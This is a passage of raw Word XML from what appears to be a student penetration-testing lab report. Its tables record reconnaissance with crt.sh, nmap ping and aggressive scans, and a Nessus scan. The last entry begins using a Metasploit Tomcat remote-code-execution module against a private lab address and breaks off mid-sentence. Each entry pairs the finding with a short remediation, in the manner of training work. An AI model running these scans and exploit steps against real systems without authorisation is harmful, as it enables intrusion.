                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SSL and CRT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A9">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AA">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Web App</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AB">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AC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AD">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AE">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">I navigated to crt.sh which is an open source site. i searched </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">totalrekall</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> to get the criteria information and among the information i found flag 3 under Common Name and Matching Identities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AF">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B0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="15621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577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rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="124460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57725" cy="12446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2">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1B3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">totalrekall.xyz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B4">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1B5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Limit the publication of the DNS records</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table15"/>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1B8">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 4</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B9">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A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Nmap Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BC">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BD">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BE">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BF">
            <w:pPr>
              <w:widowControl w:val="0"/>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1C0">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C1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">In Kali I ran a nmap scan using the command nmap -sn 192.168.13.0/24 to see a network ping scan on the targeted network range. 6 hosts were scanned so without including the host that ran the initial scan I received 5 hosts which came to be flag 4.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C2">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C3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="3098800"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="45"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4657725" cy="30988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C4">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1C5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.13.10, 192.168.13.11, 192.168.13.12, 192.168.13.14, 192.168.13.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C6">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1C7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IP blocking for unauthorized users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table16"/>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1CA">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 5</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CB">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CC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CD">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Aggressive Nmap Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CE">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CF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D0">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D1">
            <w:pPr>
              <w:widowControl w:val="0"/>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1D2">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D3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">I ran the command nmap -A 192.168.13.0/24 which is an aggressive scan and it obtained detailed scans of the hosts. 192.168.13.13 came back as the Drupal host which is flag 5.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D4">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D5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="2857500" cy="11430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57500" cy="1143000"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1841500"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="24"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657725" cy="18415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D6">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1D7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.13.13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D8">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1D9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Prevent Probes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table17"/>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1DC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 6</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DD">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DE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Nessus Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E0">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E1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Web OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E2">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E3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E4">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E5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">I navigated to the website kali:8864 for a Nessus scan. I went to create a scan with a basic network scan and used 192.168.13.12 as the targeted host to look up. After the scan was complete I navigated to the vulnerabilities tab to view the server that's critical and found the ID which is flag 6.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E6">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E7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E8">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="3111500"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="33"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4657725" cy="3111500"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1752600"/>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6577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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="3152775" cy="2619375"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="41"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3152775" cy="26193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EA">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1EB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.13.12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EC">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1ED">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Update and patch software on a regular basis. Always monitor for new vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table18"/>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1F0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 7</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F1">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2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Apache Struts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F4">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1F5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F6">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1F7">
            <w:pPr>
              <w:widowControl w:val="0"/>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1F8">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1F9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">In kali i ran the command msfconsole to get into msf6. Next I ran the command search apache tomcat </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">rce</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> to look for the exploit I needed to run. Once it ran option 6 was the exploit I needed so I ran the command use 6 and it put me into the exploit. Next I set the RHOST to 192.168.13.10. I used this ip from the aggressive nmap scan that was </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ran</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
